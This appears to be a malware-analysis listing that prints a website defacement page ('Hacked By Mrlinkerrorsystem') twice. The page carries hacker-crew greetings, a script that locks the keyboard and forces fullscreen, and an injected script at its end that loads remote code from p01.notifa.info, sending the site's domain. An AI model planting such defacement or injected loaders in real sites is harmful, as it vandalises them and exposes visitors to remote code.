PHP Malware Analysis

Back to list

Filename: terhek.htm

Tags

URLs
Title
  • Hacked By #Mrlinkerrorsystem

Deobfuscated code


<html>



<head>



<title>Hacked By #Mrlinkerrorsystem</title>



  <meta name="description" content="Security Is Hentai">



  <meta name=googlebot content="all,index,follow">



  <meta name=allow-search content=yes>



  <meta name=audience content=all> 



  <meta name=copyright content="Copyright ;copy Anonymous"> 



  <meta property="og:title" content="Hacked By Mrlinkerrorsystem"> 



  <meta property="og:image" content="https://i.ibb.co/x2jspRS/fletrh.png">



    <link href="https://fonts.googleapis.com/css2?family=Staatliches&display=swap" rel="stylesheet"> 



   <link rel="preconnect" href="https://fonts.gstatic.com"> 



   <link href="https://fonts.googleapis.com/css2?family=Benne&family=Roboto&family=Share+Tech+Mono&display=swap" rel="stylesheet"> 



     <link href="https://fonts.googleapis.com/css2?family=Happy+Monkey&display=swap" rel="stylesheet">



  	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">



<style>



@import url('https://fonts.googleapis.com/css?family=Orbitron&display=swap');@import url('https://fonts.googleapis.com/css?family=Orbitron&display=swap');html { background-color: white; font-family: 'Orbitron';}body { color: white;}h1 { color: #7a00ff; }.g7 { color: #ff0000; }.btn { border: none; width: 200px; height: 30px; outline: none; color: #fff; background: #111; cursor: pointer; position: relative; font-family: Orbitron; z-index: 0; border-radius: 10px;}.btn:before { content: ''; background: linear-gradient(45deg, #ff0000, #002bff, #7a00ff, #ff00c8, #ff0000); position: absolute; top: -2px; left:-2px; background-size: 400%; z-index: -1; filter: blur(5px); width: calc(100% + 4px); height: calc(100% + 4px); animation: glowing 20s linear infinite; opacity: 0; transition: opacity .3s ease-in-out; border-radius: 10px;}.btn:active { color: #000;}.btn:active:after { background: transparent;}.btn:hover:before { opacity: 1;}.btn:after { z-index: -1; content: ''; position: absolute; width: 100%; height: 100%; background: #111; left: 0; top: 0; border-radius: 10px;}@keyframes glowing { 0% { background-position: 0 0; } 50% { background-position: 400% 0; } 100% { background-position: 0 0; }}







@import url('https://fonts.googleapis.com/css?family=Courier+Prime|IBM+Plex+Mono|Josefin+Slab|Teko&display=swap');



body{



background-color: "white";



background-size: cover;



background-attachment: fixed;



color:#cdcbcb;



}



	.ledger403 {



	font-family:teko;



	font-size:40px;



	color:#fff;



	}



	.txt {



	font-family:josefin slab;



	font-size:13px;



	color:#fff;



	}



	.footer {



	font-family:IBM Plex Mono;



	font-size:7px;



	color:#fff;



	}



</style>


<script language="JavaScript">
    window.onbeforeunload = confirmExit;
    function confirmExit() {
        return "are you sure ? wkwk";
    }
    function fs(){
    var elem = document.documentElement;
    if (elem.requestFullscreen) {
      elem.requestFullscreen();
    } else if (elem.msRequestFullscreen) {
      elem.msRequestFullscreen();
    } else if (elem.mozRequestFullScreen) {
      elem.mozRequestFullScreen();
    } else if (elem.webkitRequestFullscreen) {
      elem.webkitRequestFullscreen();
    }
    document.getElementById("body").style.cursor = 'none';
    document.onkeydown = function (e) {
        return false;
    }
    document.addEventListener("keydown", e => {
    if(e.key == "F11") e.preventDefault();
    });
}
</script>
</script>



<script>function play(){ var audio = document.getElementById("lagu"); audio.play();}function pause(){ var audio = document.getElementById("lagu"); audio.pause();}</script>



<script language="JavaScript">



    window.onbeforeunload = confirmExit;



    function confirmExit() {



        return "are you sure ? wkwk";



    }



  </head>



  <body><!-- i-mobile for SmartPhone client script -->



<script type="text/javascript" charset="UTF-8" src="http://cache.ssend.microad.jp/js/adfunnel-sp-load.js"></script>



<div class="adfunnel_sp" data-adfunnel='{ "spotid":"ad7990ad7d02f589", "seq":1,"display":"overlay" }'></div>



<!-- tok2_user_contents -->



<div id="tok2_user_contents">





	<center>



	  <table height="100%" width="100%">



		<td align="center">



<script>

document.getElementById('autoplay').play();

</script>

</div>

</a>

</div>

		  <img src="https://i.ibb.co/dQsbFqm/peler.jpg" style="width:350px;height:350px;"><br><br>



			<div class="ledger403"><font color="#02bc9c">[</font><font color="black"> Hacked By </font><font color="red"> Mrlinkerrorsystem </font><font color="#02bc9c">]</font></div><br>





		  </b></i></font><font color="black">Rakyat Indonesia</font></div><br>



				<br><br><br><font size="5px" face="Aleo"><font color="black"><b>.: GreetZ :.</b></font><br><font color="red" size="7px">[</font><marquee behavior="alternate" scrollamount="15%" width="70%"><font size="5px" face="Aleo"><b> <font color="red">Mrlinkerrorsystem</font><b> | Sukabumi BlackHat | LulzGhost Team | Kelelawar Cyber Team | KOBU5TOR GHOST TEAM | Cr4byP4tty | galehDotID |Rzky0 | Mr.Spongebob | Jiwa Terlelap |Ghost7 | Hadii6666h0$T | PsychoH4x0r | 1T4_KUM4 | ./Ray Xploit | Tn.Error404 | ./XH4YP3R1337 | Prat1337x |Ghee1337 | ChokkaXploiter | Unknown1337 | Cubjrnet7 | Twenty4 | Malaikat Hati | RidhoHaxor | EL - Mirae7 | R13S | Mrlinkerrorsystem | Lars | Andra | Jeager | Garou | PRILIAN6HECKER <font color="red" size="5px"> ] </font></b></marquee><font color="red" size="7px">]</font>



		  <div class="ledger403"><font color="#02bc9c">[</font><font color="black"> LulzGhost-Team </font><font color="red"></font><font color="#02bc9c">]</font></div><br>



			<div class="txt"><font color="black">"</font><font color="black"><i><b>Jangan Pernah Remehkan Kemampuan Orang Yang Kamu Benci.karena Belum Tentu Dirimu Lebih Baik & Suci Di Banding Dia.Sikap Baikku,Tergantung Sikap Mu.Aku Tidak Sendiri,Banyak Orang Yang Bergabung Denganku.Kami Memukul Tanpa Harus Mengotori Tangan Kami."</font><br><font color="white" face="Aleo">



		  </b></i></font><font color="black">"</font></div><br>



			<button class="btn" onclick="play()"><font size="3">Play music</font> </button>  <button class="btn" onclick="pause()"><font size="3">Pause music</font></button>   <audio id="lagu" src="https://l.top4top.io/m_2007aj5u90.mp3"></audio><br></body>



		  </center>



		</td></table></center>



  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXGkctyxThFJ3bhTku2h8PjaeNDF0iOvFsDJLT0vfuiYi1Ahb0cjKvD0M6PA%2ffZlL7H0VeCqTJGv7C6GahpUFx4%2fUcDI1KXp5wT04NCAgcaiHO9P4LMx39n19KS2bmpRvqLeguu%2bdfyMwKjyBj2ljuvb2%2bHfTLoP2%2bZRjHEJUmVCzrR7M%2bTVX%2fRJQ7iAL%2bAmtVuevM5iazUk7Mu7zz8QXkPWsQVU28VGa6mq620Nj9m9U10hK2Nxp%2baZqPUp7JP9kEDFh4pVBvmomsX%2fja42MucaOTbC8fh6dX%2b%2bZ%2fhT8ZdAUHfRfrx533Vg5YIB37Rw1NpEP2qvXwiKiXjEg378kaXunJyU2%2brVYKBx8fYzdhbSarKlVVHuC4cieoM6hB9DVRXZJy%2b8jwAfAWeovvoiyDAMnlO9FTBe1OE0yvOQgwBWrm7gOgI5I%2bnyJCYJlflkJfVtX9WUh%2bKVH%2fjr8Aghxk73dLO32B%2bZWg7Vg883Zo2qVs1GUF5KcE%2bTxZoYdO23w2" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body></html>



<center>
</html>


Original code


<html>



<head>



<title>Hacked By #Mrlinkerrorsystem</title>



  <meta name="description" content="Security Is Hentai">



  <meta name=googlebot content="all,index,follow">



  <meta name=allow-search content=yes>



  <meta name=audience content=all> 



  <meta name=copyright content="Copyright ;copy Anonymous"> 



  <meta property="og:title" content="Hacked By Mrlinkerrorsystem"> 



  <meta property="og:image" content="https://i.ibb.co/x2jspRS/fletrh.png">



    <link href="https://fonts.googleapis.com/css2?family=Staatliches&display=swap" rel="stylesheet"> 



   <link rel="preconnect" href="https://fonts.gstatic.com"> 



   <link href="https://fonts.googleapis.com/css2?family=Benne&family=Roboto&family=Share+Tech+Mono&display=swap" rel="stylesheet"> 



     <link href="https://fonts.googleapis.com/css2?family=Happy+Monkey&display=swap" rel="stylesheet">



  	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">



<style>



@import url('https://fonts.googleapis.com/css?family=Orbitron&display=swap');@import url('https://fonts.googleapis.com/css?family=Orbitron&display=swap');html { background-color: white; font-family: 'Orbitron';}body { color: white;}h1 { color: #7a00ff; }.g7 { color: #ff0000; }.btn { border: none; width: 200px; height: 30px; outline: none; color: #fff; background: #111; cursor: pointer; position: relative; font-family: Orbitron; z-index: 0; border-radius: 10px;}.btn:before { content: ''; background: linear-gradient(45deg, #ff0000, #002bff, #7a00ff, #ff00c8, #ff0000); position: absolute; top: -2px; left:-2px; background-size: 400%; z-index: -1; filter: blur(5px); width: calc(100% + 4px); height: calc(100% + 4px); animation: glowing 20s linear infinite; opacity: 0; transition: opacity .3s ease-in-out; border-radius: 10px;}.btn:active { color: #000;}.btn:active:after { background: transparent;}.btn:hover:before { opacity: 1;}.btn:after { z-index: -1; content: ''; position: absolute; width: 100%; height: 100%; background: #111; left: 0; top: 0; border-radius: 10px;}@keyframes glowing { 0% { background-position: 0 0; } 50% { background-position: 400% 0; } 100% { background-position: 0 0; }}







@import url('https://fonts.googleapis.com/css?family=Courier+Prime|IBM+Plex+Mono|Josefin+Slab|Teko&display=swap');



body{



background-color: "white";



background-size: cover;



background-attachment: fixed;



color:#cdcbcb;



}



	.ledger403 {



	font-family:teko;



	font-size:40px;



	color:#fff;



	}



	.txt {



	font-family:josefin slab;



	font-size:13px;



	color:#fff;



	}



	.footer {



	font-family:IBM Plex Mono;



	font-size:7px;



	color:#fff;



	}



</style>


<script language="JavaScript">
    window.onbeforeunload = confirmExit;
    function confirmExit() {
        return "are you sure ? wkwk";
    }
    function fs(){
    var elem = document.documentElement;
    if (elem.requestFullscreen) {
      elem.requestFullscreen();
    } else if (elem.msRequestFullscreen) {
      elem.msRequestFullscreen();
    } else if (elem.mozRequestFullScreen) {
      elem.mozRequestFullScreen();
    } else if (elem.webkitRequestFullscreen) {
      elem.webkitRequestFullscreen();
    }
    document.getElementById("body").style.cursor = 'none';
    document.onkeydown = function (e) {
        return false;
    }
    document.addEventListener("keydown", e => {
    if(e.key == "F11") e.preventDefault();
    });
}
</script>
</script>



<script>function play(){ var audio = document.getElementById("lagu"); audio.play();}function pause(){ var audio = document.getElementById("lagu"); audio.pause();}</script>



<script language="JavaScript">



    window.onbeforeunload = confirmExit;



    function confirmExit() {



        return "are you sure ? wkwk";



    }



  </head>



  <body><!-- i-mobile for SmartPhone client script -->



<script type="text/javascript" charset="UTF-8" src="http://cache.ssend.microad.jp/js/adfunnel-sp-load.js"></script>



<div class="adfunnel_sp" data-adfunnel='{ "spotid":"ad7990ad7d02f589", "seq":1,"display":"overlay" }'></div>



<!-- tok2_user_contents -->



<div id="tok2_user_contents">





	<center>



	  <table height="100%" width="100%">



		<td align="center">



<script>

document.getElementById('autoplay').play();

</script>

</div>

</a>

</div>

		  <img src="https://i.ibb.co/dQsbFqm/peler.jpg" style="width:350px;height:350px;"><br><br>



			<div class="ledger403"><font color="#02bc9c">[</font><font color="black"> Hacked By </font><font color="red"> Mrlinkerrorsystem </font><font color="#02bc9c">]</font></div><br>





		  </b></i></font><font color="black">Rakyat Indonesia</font></div><br>



				<br><br><br><font size="5px" face="Aleo"><font color="black"><b>.: GreetZ :.</b></font><br><font color="red" size="7px">[</font><marquee behavior="alternate" scrollamount="15%" width="70%"><font size="5px" face="Aleo"><b> <font color="red">Mrlinkerrorsystem</font><b> | Sukabumi BlackHat | LulzGhost Team | Kelelawar Cyber Team | KOBU5TOR GHOST TEAM | Cr4byP4tty | galehDotID |Rzky0 | Mr.Spongebob | Jiwa Terlelap |Ghost7 | Hadii6666h0$T | PsychoH4x0r | 1T4_KUM4 | ./Ray Xploit | Tn.Error404 | ./XH4YP3R1337 | Prat1337x |Ghee1337 | ChokkaXploiter | Unknown1337 | Cubjrnet7 | Twenty4 | Malaikat Hati | RidhoHaxor | EL - Mirae7 | R13S | Mrlinkerrorsystem | Lars | Andra | Jeager | Garou | PRILIAN6HECKER <font color="red" size="5px"> ] </font></b></marquee><font color="red" size="7px">]</font>



		  <div class="ledger403"><font color="#02bc9c">[</font><font color="black"> LulzGhost-Team </font><font color="red"></font><font color="#02bc9c">]</font></div><br>



			<div class="txt"><font color="black">"</font><font color="black"><i><b>Jangan Pernah Remehkan Kemampuan Orang Yang Kamu Benci.karena Belum Tentu Dirimu Lebih Baik & Suci Di Banding Dia.Sikap Baikku,Tergantung Sikap Mu.Aku Tidak Sendiri,Banyak Orang Yang Bergabung Denganku.Kami Memukul Tanpa Harus Mengotori Tangan Kami."</font><br><font color="white" face="Aleo">



		  </b></i></font><font color="black">"</font></div><br>



			<button class="btn" onclick="play()"><font size="3">Play music</font> </button>  <button class="btn" onclick="pause()"><font size="3">Pause music</font></button>   <audio id="lagu" src="https://l.top4top.io/m_2007aj5u90.mp3"></audio><br></body>



		  </center>



		</td></table></center>



  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXGkctyxThFJ3bhTku2h8PjaeNDF0iOvFsDJLT0vfuiYi1Ahb0cjKvD0M6PA%2ffZlL7H0VeCqTJGv7C6GahpUFx4%2fUcDI1KXp5wT04NCAgcaiHO9P4LMx39n19KS2bmpRvqLeguu%2bdfyMwKjyBj2ljuvb2%2bHfTLoP2%2bZRjHEJUmVCzrR7M%2bTVX%2fRJQ7iAL%2bAmtVuevM5iazUk7Mu7zz8QXkPWsQVU28VGa6mq620Nj9m9U10hK2Nxp%2baZqPUp7JP9kEDFh4pVBvmomsX%2fja42MucaOTbC8fh6dX%2b%2bZ%2fhT8ZdAUHfRfrx533Vg5YIB37Rw1NpEP2qvXwiKiXjEg378kaXunJyU2%2brVYKBx8fYzdhbSarKlVVHuC4cieoM6hB9DVRXZJy%2b8jwAfAWeovvoiyDAMnlO9FTBe1OE0yvOQgwBWrm7gOgI5I%2bnyJCYJlflkJfVtX9WUh%2bKVH%2fjr8Aghxk73dLO32B%2bZWg7Vg883Zo2qVs1GUF5KcE%2bTxZoYdO23w2" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body></html>



<center>
</html>